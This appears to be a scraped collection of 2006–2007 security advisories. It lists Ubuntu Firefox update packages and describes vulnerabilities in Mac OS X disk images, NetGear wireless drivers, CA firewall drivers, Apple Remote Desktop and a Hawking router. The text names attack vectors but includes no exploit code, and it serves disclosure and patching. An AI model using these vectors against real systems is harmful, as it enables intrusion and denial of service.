8b430af0eadfa18b180f2637fafa7a5e http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox_1.5.dfsg+1.5.0.10-0ubuntu0.5.10.1_sparc.deb Size/MD5: 9227232 727146f6c93a565f8aabda0a1bbfc80b Updated packages for Ubuntu 6.06 LTS: Source archives: http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox_1.5.dfsg+1.5.0.10-0ubuntu0.6.06.1.diff.gz Size/MD5: 177547 396588ea856af87e8137682342648d1d http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox_1.5.dfsg+1.5.0.10-0ubuntu0.6.06.1.dsc Size/MD5: 1120 1625dcf8053738851d0a2978b6f0e315 http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox_1.5.dfsg+1.5.0.10.orig.tar.gz Size/MD5: 44679183 d55d439c238064ddcedb8fabb6089ff2 Architecture independent packages: http://security.ubuntu.com/ubuntu/pool/universe/f/firefox/mozilla-firefox-dev_1.5.dfsg+1.5.0.10-0ubuntu0.6.06.1_all.deb Size/MD5: 50410 66f8a212fb4dbf22b9c8abbb21650d2c http://security.ubuntu.com/ubuntu/pool/main/f/firefox/mozilla-firefox_1.5.dfsg+1.5.0.10-0ubuntu0.6.06.1_all.deb Size/MD5: 51296 8dc3631d49303156f74ba2e0ad72c744 amd64 architecture (Athlon64, Opteron, EM64T Xeon) http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox-dbg_1.5.dfsg+1.5.0.10-0ubuntu0.6.06.1_amd64.deb Size/MD5: 47439362 0e8e0cc7f0385fc74a953610f7f41c11 http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox-dev_1.5.dfsg+1.5.0.10-0ubuntu0.6.06.1_amd64.deb Size/MD5: 2804532 a9c1cd1a790a715b6ad58785cb0eea01 http://security.ubuntu.com/ubuntu/pool/universe/f/firefox/firefox-dom-inspector_1.5.dfsg+1.5.0.10-0ubuntu0.6.06.1_amd64.deb Size/MD5: 217360 f217f66f7563f80f309e065a44a08cfb http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox-gnome-support_1.5.dfsg+1.5.0.10-0ubuntu0.6.06.1_amd64.deb Size/MD5: 83620 0b3738208c8069b8a5449a59ae604293 http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox_1.5.dfsg+1.5.0.10-0ubuntu0.6.06.1_amd64.deb Size/MD5: 9553646 c66621583e808b88663b200ad3238f7a http://security.ubuntu.com/ubuntu/pool/main/f/firefox/libnspr-dev_1.firefox1.5.dfsg+1.5.0.10-0ubuntu0.6.06.1_amd64.deb Size/MD5: 220158 e4f1cc5b0c2edc41cf1e4c6aa3051a33 http://security.ubuntu.com/ubuntu/pool/main/f/firefox/libnspr4_1.firefox1.5.dfsg+1.5.0.10-0ubuntu0.6.06.1_amd64.deb Size/MD5: 163484 e1c0ab1f05132b717751783ccc0c22c1 http://security.ubuntu.com/ubuntu/pool/main/f/firefox/libnss-dev_1.firefox1.5.dfsg+1.5.0.10-0ubuntu0.6.06.1_amd64.deb Size/MD5: 245468 10d43347432618aaa140c081c20ed10f http://security.ubuntu.com/ubuntu/pool/main/f/firefox/libnss3_1.firefox1.5.dfsg+1.5.0.10-0ubuntu0.6.06.1_amd64.deb Size/MD5: 710556 53cb8cc7e3a7d346630184980df34ff5 i386 architecture (x86 compatible Intel/AMD) http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox-dbg_1.5.dfsg+1.5.0.10-0ubuntu0.6.06.1_i386.deb Size/MD5: 44003676 a53682ff42f56d8dd494c96d2e3817d5 http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox-dev_1.5.dfsg+1.5.0.10-0ubuntu0.6.06.1_i386.deb Size/MD5: 2804534 281bc91e92c6224df7c77b4ce2840e1b http://security.ubuntu.com/ubuntu/pool/universe/f/firefox/firefox-dom-inspector_1.5.dfsg+1.5.0.10-0ubuntu0.6.06.1_i386.deb Size/MD5: 210766 0d2d6ecfaa6ad0b629fc78159a8ba0f3 http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox-gnome-support_1.5.dfsg+1.5.0.10-0ubuntu0.6.06.1_i386.deb Size/MD5: 75992 fc370791f6533f01409d3b369505766a http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox_1.5.dfsg+1.5.0.10-0ubuntu0.6.06.1_i386.deb Size/MD5: 8044874 cbda163790d814d785831358cb53cabc http://security.ubuntu.com/ubuntu/pool/main/f/firefox/libnspr-dev_1.firefox1.5.dfsg+1.5.0.10-0ubuntu0.6.06.1_i386.deb Size/MD5: 220160 2067d9432ff164e7344bd8142bb026ff http://security.ubuntu.com/ubuntu/pool/main/f/firefox/libnspr4_1.firefox1.5.dfsg+1.5.0.10-0ubuntu0.6.06.1_i386.deb Size/MD5: 148072 274cd0206aafa1a5ad02dbe279a37216 http://security.ubuntu.com/ubuntu/pool/main/f/firefox/libnss-dev_1.firefox1.5.dfsg+1.5.0.10-0ubuntu0.6.06.1_i386.deb Size/MD5: 245474 ed709e80de120a795d79df237b6dd421 http://security.ubuntu.com/ubuntu/pool/main/f/firefox/libnss3_1.firefox1.5.dfsg+1.5.0.10-0ubuntu0.6.06.1_i386.deb Size/MD5: 616162 766f3224ad0924ae1d47c6970a2bfd16 powerpc architecture (Apple Macintosh G3/G4/G5) http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox-dbg_1.5.dfsg+1.5.0.10-0ubuntu0.6.06.1_powerpc.deb Size/MD5: 48831230 a594a826614ab062cb8e12a5e67a7115 http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox-dev_1.5.dfsg+1.5.0.10-0ubuntu0.6.06.1_powerpc.deb Size/MD5: 2804524 01b3f645267c4b3b166a6dcdebe099cf http://security.ubuntu.com/ubuntu/pool/universe/f/firefox/firefox-dom-inspector_1.5.dfsg+1.5.0.10-0ubuntu0.6.06.1_powerpc.deb Size/MD5: 214208 d5563084e7a175423a1a27d98270c5a7 http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox-gnome-support_1.5.dfsg+1.5.0.10-0ubuntu0.6.06.1_powerpc.deb Size/MD5: 79110 fa20295177cf290ee980127c3ed1ff33 http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox_1.5.dfsg+1.5.0.10-0ubuntu0.6.06.1_powerpc.deb Size/MD5: 9215262 f641d7657a284bd049c75d5119512013 http://security.ubuntu.com/ubuntu/pool/main/f/firefox/libnspr-dev_1.firefox1.5.dfsg+1.5.0.10-0ubuntu0.6.06.1_powerpc.deb Size/MD5: 220160 b684d9f82943b8698b9f369737cd318a http://security.ubuntu.com/ubuntu/pool/main/f/firefox/libnspr4_1.firefox1.5.dfsg+1.5.0.10-0ubuntu0.6.06.1_powerpc.deb Size/MD5: 160684 0919604b7e446d0a7923968ee1d0357b http://security.ubuntu.com/ubuntu/pool/main/f/firefox/libnss-dev_1.firefox1.5.dfsg+1.5.0.10-0ubuntu0.6.06.1_powerpc.deb Size/MD5: 245472 d9e5620a0672e46e89a90123430e78ae http://security.ubuntu.com/ubuntu/pool/main/f/firefox/libnss3_1.firefox1.5.dfsg+1.5.0.10-0ubuntu0.6.06.1_powerpc.deb Size/MD5: 655490 5c4225025b12a75900899859c6b616d1 sparc architecture (Sun SPARC/UltraSPARC) http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox-dbg_1.5.dfsg+1.5.0.10-0ubuntu0.6.06.1_sparc.deb Size/MD5: 45406824 2ade39640c714000138eec2c5b8691f9 http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox-dev_1.5.dfsg+1.5.0.10-0ubuntu0.6.06.1_sparc.deb Size/MD5: 2804570 0f0d35704d9f00e41c3ccce5535cb9ce http://security.ubuntu.com/ubuntu/pool/universe/f/firefox/firefox-dom-inspector_1.5.dfsg+1.5.0.10-0ubuntu0.6.06.1_sparc.deb Size/MD5: 211712 f88704bb8c6671debcfae882f408c607 http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox-gnome-support_1.5.dfsg+1.5.0.10-0ubuntu0.6.06.1_sparc.deb Size/MD5: 77564 d5b89bc054fb2c6cf0089b04c727d0a7 http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox_1.5.dfsg+1.5.0.10-0ubuntu0.6.06.1_sparc.deb Size/MD5: 8571602 6eb03eae7ffb19c3afc766a016d2e723 http://security.ubuntu.com/ubuntu/pool/main/f/firefox/libnspr-dev_1.firefox1.5.dfsg+1.5.0.10-0ubuntu0.6.06.1_sparc.deb Size/MD5: 220156 a92bbd2e0e9a936355abeaae9376264c http://security.ubuntu.com/ubuntu/pool/main/f/firefox/libnspr4_1.firefox1.5.dfsg+1.5.0.10-0ubuntu0.6.06.1_sparc.deb Size/MD5: 150554 85be23282c348b3de7bf3786aa56a5a6 http://security.ubuntu.com/ubuntu/pool/main/f/firefox/libnss-dev_1.firefox1.5.dfsg+1.5.0.10-0ubuntu0.6.06.1_sparc.deb Size/MD5: 245474 dd03340bae55531e40a887ad5204c774 http://security.ubuntu.com/ubuntu/pool/main/f/firefox/libnss3_1.firefox1.5.dfsg+1.5.0.10-0ubuntu0.6.06.1_sparc.deb Size/MD5: 599816 04b5ea1db1aa17f292481d913eddecb5 Updated packages for Ubuntu 6.10: Source archives: http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox_2.0.0.2+0dfsg-0ubuntu0.6.10.diff.gz Size/MD5: 322293 4d8894d022833e46c25d5e6ce269ee5b http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox_2.0.0.2+0dfsg-0ubuntu0.6.10.dsc Size/MD5: 1218 c6708c7c771a995e0ec709cc022ce61a http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox_2.0.0.2+0dfsg.orig.tar.gz Size/MD5: 46466665 f6dad051f9995ebba310e8cd6497ae9f Architecture independent packages: http://security.ubuntu.com/ubuntu/pool/universe/f/firefox/firefox-dom-inspector_2.0.0.2+0dfsg-0ubuntu0.6.10_all.deb Size/MD5: 236878 52d4d42a0881949da47a5f7946d2edec http://security.ubuntu.com/ubuntu/pool/universe/f/firefox/mozilla-firefox-dev_2.0.0.2+0dfsg-0ubuntu0.6.10_all.deb Size/MD5: 55668 a379aaf8d4f67465c0e71aaa852a3b8a http://security.ubuntu.com/ubuntu/pool/universe/f/firefox/mozilla-firefox-dom-inspector_2.0.0.2+0dfsg-0ubuntu0.6.10_all.deb Size/MD5: 55762 aea5774743b8e3bc90c8349099e9c423 http://security.ubuntu.com/ubuntu/pool/universe/f/firefox/mozilla-firefox-gnome-support_2.0.0.2+0dfsg-0ubuntu0.6.10_all.deb Size/MD5: 55776 85b1c150c432f3fc2038a5ff3a5804ed http://security.ubuntu.com/ubuntu/pool/universe/f/firefox/mozilla-firefox_2.0.0.2+0dfsg-0ubuntu0.6.10_all.deb Size/MD5: 56574 91e46691914551281676003e3b6589bb amd64 architecture (Athlon64, Opteron, EM64T Xeon) http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox-dbg_2.0.0.2+0dfsg-0ubuntu0.6.10_amd64.deb Size/MD5: 50341952 381fc5626f047660d2bdd680824db54d http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox-dev_2.0.0.2+0dfsg-0ubuntu0.6.10_amd64.deb Size/MD5: 3120906 263ed42e4bdbcc4ba3010744cb900160 http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox-gnome-support_2.0.0.2+0dfsg-0ubuntu0.6.10_amd64.deb Size/MD5: 90062 198b64dcde3d7e1eb9bed2aeb32ce808 http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox_2.0.0.2+0dfsg-0ubuntu0.6.10_amd64.deb Size/MD5: 10399974 e3adef875d5fefa75c56fdf614183bdc http://security.ubuntu.com/ubuntu/pool/main/f/firefox/libnspr-dev_1.firefox2.0.0.2+0dfsg-0ubuntu0.6.10_amd64.deb Size/MD5: 225444 9a1465fcc7386edba0fb81d00079066e http://security.ubuntu.com/ubuntu/pool/main/f/firefox/libnspr4_1.firefox2.0.0.2+0dfsg-0ubuntu0.6.10_amd64.deb Size/MD5: 168168 1ccb3b97ed970c07bbdf6fb769f2e4b5 http://security.ubuntu.com/ubuntu/pool/main/f/firefox/libnss-dev_1.firefox2.0.0.2+0dfsg-0ubuntu0.6.10_amd64.deb Size/MD5: 250820 df7c647e48cb8941a0421d5f1a5c4661 http://security.ubuntu.com/ubuntu/pool/main/f/firefox/libnss3_1.firefox2.0.0.2+0dfsg-0ubuntu0.6.10_amd64.deb Size/MD5: 862110 87c01e4266d1c06d1097e5f8a58806d2 i386 architecture (x86 compatible Intel/AMD) http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox-dbg_2.0.0.2+0dfsg-0ubuntu0.6.10_i386.deb Size/MD5: 49498816 4c61ffe25628585a91e1d90180997343 http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox-dev_2.0.0.2+0dfsg-0ubuntu0.6.10_i386.deb Size/MD5: 3111488 1ec3b0bbe8564828421f381ed8b0d5fb http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox-gnome-support_2.0.0.2+0dfsg-0ubuntu0.6.10_i386.deb Size/MD5: 83792 91c2b8d2410921fd6e19c742e9552550 http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox_2.0.0.2+0dfsg-0ubuntu0.6.10_i386.deb Size/MD5: 9225462 4c0d2cb608ee830bdc38b7f8d89f9a33 http://security.ubuntu.com/ubuntu/pool/main/f/firefox/libnspr-dev_1.firefox2.0.0.2+0dfsg-0ubuntu0.6.10_i386.deb Size/MD5: 225434 5293ae8d41c018d4a956555c189fd7f6 http://security.ubuntu.com/ubuntu/pool/main/f/firefox/libnspr4_1.firefox2.0.0.2+0dfsg-0ubuntu0.6.10_i386.deb Size/MD5: 157774 cc2c474e306b1d80db79cdba936c2ee6 http://security.ubuntu.com/ubuntu/pool/main/f/firefox/libnss-dev_1.firefox2.0.0.2+0dfsg-0ubuntu0.6.10_i386.deb Size/MD5: 250794 42e6e643fb73ae668e569ec3d5052ea9 http://security.ubuntu.com/ubuntu/pool/main/f/firefox/libnss3_1.firefox2.0.0.2+0dfsg-0ubuntu0.6.10_i386.deb Size/MD5: 785948 fefc874278ea69ba2a8b518d6826e158 powerpc architecture (Apple Macintosh G3/G4/G5) http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox-dbg_2.0.0.2+0dfsg-0ubuntu0.6.10_powerpc.deb Size/MD5: 52033226 d7ddf5236086638446d6ea4775c833ee http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox-dev_2.0.0.2+0dfsg-0ubuntu0.6.10_powerpc.deb Size/MD5: 3117424 0a5038c00b1997b6c7b72f16e1ca85e7 http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox-gnome-support_2.0.0.2+0dfsg-0ubuntu0.6.10_powerpc.deb Size/MD5: 85668 25e4f56d5311cc9e3a0ecaf28d6189ff http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox_2.0.0.2+0dfsg-0ubuntu0.6.10_powerpc.deb Size/MD5: 10067834 1758c9d69c571c0d7bf9ec20b74e2a33 http://security.ubuntu.com/ubuntu/pool/main/f/firefox/libnspr-dev_1.firefox2.0.0.2+0dfsg-0ubuntu0.6.10_powerpc.deb Size/MD5: 225432 241089d26f31cb5e0816debe7b09a55d http://security.ubuntu.com/ubuntu/pool/main/f/firefox/libnspr4_1.firefox2.0.0.2+0dfsg-0ubuntu0.6.10_powerpc.deb Size/MD5: 166830 dd932812a920701677df9b3bf9970023 http://security.ubuntu.com/ubuntu/pool/main/f/firefox/libnss-dev_1.firefox2.0.0.2+0dfsg-0ubuntu0.6.10_powerpc.deb Size/MD5: 250798 65cddc61ad6f809004d342dcdf07c2cc http://security.ubuntu.com/ubuntu/pool/main/f/firefox/libnss3_1.firefox2.0.0.2+0dfsg-0ubuntu0.6.10_powerpc.deb Size/MD5: 860802 217ffcce7a3a99cabd9b4cff500281a8 sparc architecture (Sun SPARC/UltraSPARC) http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox-dbg_2.0.0.2+0dfsg-0ubuntu0.6.10_sparc.deb Size/MD5: 49550142 e432529be2a2c6b7b327ede81d2cc1c3 http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox-dev_2.0.0.2+0dfsg-0ubuntu0.6.10_sparc.deb Size/MD5: 3108058 4a2bc97252c385fe323b56b7fb03c64f http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox-gnome-support_2.0.0.2+0dfsg-0ubuntu0.6.10_sparc.deb Size/MD5: 83484 8d24e2420d7d2188a620674aa566956d http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox_2.0.0.2+0dfsg-0ubuntu0.6.10_sparc.deb Size/MD5: 9493984 e311cd75fa46ed1a47958f6883ea65aa http://security.ubuntu.com/ubuntu/pool/main/f/firefox/libnspr-dev_1.firefox2.0.0.2+0dfsg-0ubuntu0.6.10_sparc.deb Size/MD5: 225444 fdcd4bf5450574bcbe7d3aca89dbc403 http://security.ubuntu.com/ubuntu/pool/main/f/firefox/libnspr4_1.firefox2.0.0.2+0dfsg-0ubuntu0.6.10_sparc.deb Size/MD5: 155678 a99e5fc7bef8c29e0e89c48288144fc6 http://security.ubuntu.com/ubuntu/pool/main/f/firefox/libnss-dev_1.firefox2.0.0.2+0dfsg-0ubuntu0.6.10_sparc.deb Size/MD5: 250800 dd3473d37b593e55c82f5dce245bebe0 http://security.ubuntu.com/ubuntu/pool/main/f/firefox/libnss3_1.firefox2.0.0.2+0dfsg-0ubuntu0.6.10_sparc.deb Size/MD5: 766616 ba23d67757ddc39888e92f6af56ec67d

Unspecified vulnerability in Apple Mac OS X 10.4.8, and possibly other versions, allows remote attackers to cause a denial of service (crash) via a malformed UDTO HFS+ disk image, such as with "bad sectors," which triggers memory corruption. Apple Mac OS X fails to properly handle corrupted UDTO HFS+ image structures. This vulnerability may allow an attacker to cause a denial-of-service condition. Successfully exploiting this issue allows remote users to crash affected computers, denying service to legitimate users. Mac OS X version 10.4.8 is vulnerable to this issue; other versions may also be affected. Note: Further information from Alastair Houghton reports that this issue cannot be exploited to execute arbitrary code. See the references for details. Attackers may also be able to exploit this issue for remote code execution, but this is reportedly unlikely

com.apple.AppleDiskImageController in Apple Mac OS X 10.4.8, and possibly other versions, allows remote attackers to execute arbitrary code via a malformed DMG image that triggers memory corruption. NOTE: the severity of this issue has been disputed by a third party, who states that the impact is limited to a denial of service (kernel panic) due to a vm_fault call with a non-aligned address. The complete impact of this vulnerability is unclear, but may include execution of arbitrary code or denial of service. The complete impact of this vulnerability is unclear, but may include execution of arbitrary code or denial of service. Service disruption (DoS) It may be in a state. Successfully exploiting this issue allows remote users to crash affected computers, denying service to legitimate users. Mac OS X version 10.4.8 is vulnerable to this issue; other versions may also be affected. Note: Further information from Alastair Houghton reports that this issue cannot be exploited to execute arbitrary code. See the references for details. This vulnerability is triggered if a user is tricked into loading a malicious DMG file, leading to arbitrary kernel mode code execution

Buffer overflow in MA521nd5.SYS driver 5.148.724.2003 for NetGear MA521 PCMCIA adapter allows remote attackers to execute arbitrary code via (1) beacon or (2) probe 802.11 frame responses with an long supported rates information element. NOTE: this issue was reported as a "memory corruption" error, but the associated exploit code suggests that it is a buffer overflow. A buffer overflow vulnerability exists in the Netgear MA521nd5.SYS wireless driver. Successful exploitation of this vulnerability may allow an attacker to execute arbitrary code, or cause a denial-of-service condition. NetGear MA521 is an 802.11b wireless PC network card.  If a malformed frame (beacon or probe response) is received in the active scan mode, the MA521nd5.SYS driver of the MA521 will attempt to write to a memory location controlled by the attacker. Failed attempts will likely crash the kernel, resulting in denial-of-service conditions. Note that this vulnerability can be exploited only when an attacker is within the range of broadcast of 802.11 wireless connections. Version 5.148.724.2003 of the MA521nd5.SYS driver is vulnerable to this issue; other versions may also be affected. ---------------------------------------------------------------------- To improve our services to our customers, we have made a number of additions to the Secunia Advisories and have started translating the advisories to German. The improvements will help our customers to get a better understanding of how we reached our conclusions, how it was rated, our thoughts on exploitation, attack vectors, and scenarios. This includes: * Reason for rating * Extended description * Extended solution * Exploit code or links to exploit code * Deep links Read the full description: http://corporate.secunia.com/products/48/?r=l Contact Secunia Sales for more information: http://corporate.secunia.com/how_to_buy/15/?r=l ---------------------------------------------------------------------- TITLE: NetGear MA521 Wireless Driver Long Rates Memory Corruption SECUNIA ADVISORY ID: SA23036 VERIFY ADVISORY: http://secunia.com/advisories/23036/ CRITICAL: Moderately critical IMPACT: System access WHERE: >From remote SOFTWARE: NetGear MA521 802.11b Wireless PC Card 5.x http://secunia.com/product/12673/ DESCRIPTION: Laurent Butti has reported a vulnerability in NetGear MA521 Wireless driver, which can be exploited by malicious people to compromise a vulnerable system. This can be exploited to cause a memory corruption via a specially crafted packet when the driver is running in active scanning mode. The vulnerability is reported in version 5.148.724.2003. SOLUTION: Turn off the wireless card when not in use. PROVIDED AND/OR DISCOVERED BY: Laurent Butti ORIGINAL ADVISORY: http://projects.info-pull.com/mokb/MOKB-18-11-2006.html ---------------------------------------------------------------------- About: This Advisory was delivered by Secunia as a free service to help everybody keeping their systems up to date against the latest vulnerabilities. Subscribe: http://secunia.com/secunia_security_advisories/ Definitions: (Criticality, Where etc.) http://secunia.com/about_secunia_advisories/ Please Note: Secunia recommends that you verify all advisories you receive by clicking the link. Secunia NEVER sends attached files with advisories. Secunia does not advise people to install third party patches, only use those supplied by the vendor. ---------------------------------------------------------------------- Unsubscribe: Secunia Security Advisories http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org ----------------------------------------------------------------------

Stack-based buffer overflow in WG111v2.SYS in NetGear WG111v2 wireless adapter (USB) allows remote attackers to execute arbitrary code via a long 802.11 beacon request. A buffer overflow vulnerability has been reported in the Netgear WG111v2.SYS wireless driver. Successful exploitation of this vulnerability may allow an attacker to execute arbitrary code, or cause a denial-of-service condition. Failed attempts will likely crash the kernel, resulting in denial-of-service conditions. The WG111v2.SYS driver is primarily used on Windows, but administrators should check Linux and BSD machines using the 'ndiswrapper' tool to determine if they are using a vulnerable instance of the driver. Note also that an attacker can exploit tthis vulnerability only from within the range of broadcast of 802.11 wireless connections. Version 5.1213.6.316 of the WG111v2.SYS driver is vulnerable to this issue; other versions may also be affected. ---------------------------------------------------------------------- To improve our services to our customers, we have made a number of additions to the Secunia Advisories and have started translating the advisories to German. The improvements will help our customers to get a better understanding of how we reached our conclusions, how it was rated, our thoughts on exploitation, attack vectors, and scenarios. This includes: * Reason for rating * Extended description * Extended solution * Exploit code or links to exploit code * Deep links Read the full description: http://corporate.secunia.com/products/48/?r=l Contact Secunia Sales for more information: http://corporate.secunia.com/how_to_buy/15/?r=l ---------------------------------------------------------------------- TITLE: NetGear WG111v2 Wireless Driver Beacon Request Buffer Overflow SECUNIA ADVISORY ID: SA22962 VERIFY ADVISORY: http://secunia.com/advisories/22962/ CRITICAL: Moderately critical IMPACT: System access WHERE: >From remote SOFTWARE: NetGear WG111v2 Wireless Driver 1.x http://secunia.com/product/12649/ NetGear WG111v2 Wireless Driver 2.x http://secunia.com/product/12650/ DESCRIPTION: A vulnerability has been reported in NetGear WG111v2 wireless driver, which can be exploited by malicious people to compromise a user's system. The vulnerability is caused due to a boundary error in the WG111v2.SYS driver when handling beacon requests. SOLUTION: Turn off the wireless card when not in use to reduce the risk. PROVIDED AND/OR DISCOVERED BY: H D Moore ORIGINAL ADVISORY: http://projects.info-pull.com/mokb/MOKB-16-11-2006.html ---------------------------------------------------------------------- About: This Advisory was delivered by Secunia as a free service to help everybody keeping their systems up to date against the latest vulnerabilities. Subscribe: http://secunia.com/secunia_security_advisories/ Definitions: (Criticality, Where etc.) http://secunia.com/about_secunia_advisories/ Please Note: Secunia recommends that you verify all advisories you receive by clicking the link. Secunia NEVER sends attached files with advisories. Secunia does not advise people to install third party patches, only use those supplied by the vendor. ---------------------------------------------------------------------- Unsubscribe: Secunia Security Advisories http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org ----------------------------------------------------------------------

Computer Associates Host Intrusion Prevention System (HIPS) drivers (1) Core kmxstart.sys 6.5.4.31 and (2) Firewall kmxfw.sys 6.5.4.10 allow local users to gain privileges by using certain privileged IOCTLs to modify callback function pointers. Multiple Computer Associates security-related products are prone to multiple local privilege-escalation vulnerabilities. An attacker can leverage these issues to execute arbitrary code with SYSTEM-level privileges. This could result in the complete compromise of vulnerable computers. These isses affect CA Personal Firewall 2007 (v9.0) Engine version 1.0.173 and prior and CA Internet Security Suite 2007 version 3.0 with CA Personal Firewall 2007 version 9.0 Engine version 1.0.173 and prior. Computer Associates is the world's leading security vendor, products include a variety of anti-virus software and backup recovery systems. There is a problem in the implementation of the driver of CA HIPS products, and local attackers may use this vulnerability to elevate their privileges. ---------------------------------------------------------------------- To improve our services to our customers, we have made a number of additions to the Secunia Advisories and have started translating the advisories to German. The improvements will help our customers to get a better understanding of how we reached our conclusions, how it was rated, our thoughts on exploitation, attack vectors, and scenarios. This includes: * Reason for rating * Extended description * Extended solution * Exploit code or links to exploit code * Deep links Read the full description: http://corporate.secunia.com/products/48/?r=l Contact Secunia Sales for more information: http://corporate.secunia.com/how_to_buy/15/?r=l ---------------------------------------------------------------------- TITLE: CA Personal Firewall HIPS Drivers Privilege Escalation SECUNIA ADVISORY ID: SA22972 VERIFY ADVISORY: http://secunia.com/advisories/22972/ CRITICAL: Less critical IMPACT: Privilege escalation WHERE: Local system SOFTWARE: CA Personal Firewall 2007 9.x http://secunia.com/product/12660/ DESCRIPTION: Rub\xe9n Santamarta has reported some vulnerabilities in CA Personal Firewall, which can be exploited by malicious people to gain escalated privileges. The vulnerabilities are caused due to errors in the HIPS Core (KmxStart.sys) and HIPS Firewall (KmxFw.sys) drivers. This can be exploited to modify some implemented callbacks via certain privileged IOCTLs. Other versions and products may also be affected. SOLUTION: Grant only trusted users access to affected systems. The vendor is reportedly working on the patches. PROVIDED AND/OR DISCOVERED BY: Rub\xe9n Santamarta, reversemode.com. ORIGINAL ADVISORY: Reversemode.com: http://www.reversemode.com/index.php?option=com_remository&Itemid=2&func=fileinfo&id=38 ---------------------------------------------------------------------- About: This Advisory was delivered by Secunia as a free service to help everybody keeping their systems up to date against the latest vulnerabilities. Subscribe: http://secunia.com/secunia_security_advisories/ Definitions: (Criticality, Where etc.) http://secunia.com/about_secunia_advisories/ Please Note: Secunia recommends that you verify all advisories you receive by clicking the link. Secunia NEVER sends attached files with advisories. Secunia does not advise people to install third party patches, only use those supplied by the vendor. ---------------------------------------------------------------------- Unsubscribe: Secunia Security Advisories http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org ---------------------------------------------------------------------- . Local attackers can exploit these vulnerabilities to gain escalated privileges. Mitigating Factors: Local user account required for exploitation. Severity: CA has given these vulnerability issues a Medium risk rating. Customers running one of the affected products simply need to ensure that they have allowed this automatic update to take place. Determining if you are affected: To ensure that the update has taken place, customers can view the Help > About screen in their CA Personal Firewall product and confirm that their engine version number is 1.0.176 or higher. http://marc.theaimsgroup.com/?l=bugtraq&m=116379521731676&w=2 Changelog for this advisory: v1.0 - Initial Release Customers who require additional information should contact CA Technical Support at http://supportconnect.ca.com. For technical questions or comments related to this advisory, please send email to vuln@ca.com. If you discover a vulnerability in CA products, please report your findings to vuln@ca.com, or utilize our "Submit a Vulnerability" form. URL: http://www3.ca.com/securityadvisor/vulninfo/submit.aspx Regards, Ken Williams ; 0xE2941985 Director, CA Vulnerability Research CA, One CA Plaza, Islandia, NY 11749 Contact http://www3.ca.com/contact/ Legal Notice http://www3.ca.com/legal/ Privacy Policy http://www3.ca.com/privacy/ Copyright (c) 2007 CA. All rights reserved

Apple Remote Desktop before 3.1 uses insecure permissions for certain built-in packages, which allows local users on an Apple Remote Desktop administration system to modify the packages and gain root privileges on client systems that use the packages. Apple Remote Desktop is prone to an insecure-default-permissions vulnerability. Successfully exploiting this issue allows attackers to alter the contents of packages that may subsequently be installed on remote computers. This facilitates the complete compromise of remote computers controlled by the vulnerable Remote Desktop server computer. ---------------------------------------------------------------------- To improve our services to our customers, we have made a number of additions to the Secunia Advisories and have started translating the advisories to German. The improvements will help our customers to get a better understanding of how we reached our conclusions, how it was rated, our thoughts on exploitation, attack vectors, and scenarios. Successful exploitation may allow execution of arbitrary code with "root" privileges on client systems when installing or updating the software. SOLUTION: Update to version 3.1. ORIGINAL ADVISORY: Apple: http://docs.info.apple.com/article.html?artnum=304824 ---------------------------------------------------------------------- About: This Advisory was delivered by Secunia as a free service to help everybody keeping their systems up to date against the latest vulnerabilities. Subscribe: http://secunia.com/secunia_security_advisories/ Definitions: (Criticality, Where etc.) http://secunia.com/about_secunia_advisories/ Please Note: Secunia recommends that you verify all advisories you receive by clicking the link. Secunia NEVER sends attached files with advisories. Secunia does not advise people to install third party patches, only use those supplied by the vendor. ---------------------------------------------------------------------- Unsubscribe: Secunia Security Advisories http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org ----------------------------------------------------------------------

Hawking Technology wireless router WR254-CA uses a hardcoded IP address among the set of DNS server IP addresses, which could allow remote attackers to cause a denial of service or hijack the router by attacking or spoofing the server at the hardcoded address. NOTE: it could be argued that this issue reflects an inherent limitation of DNS itself, so perhaps it should not be included in CVE. Wr254-Ca Wireless Router is prone to a denial-of-service vulnerability

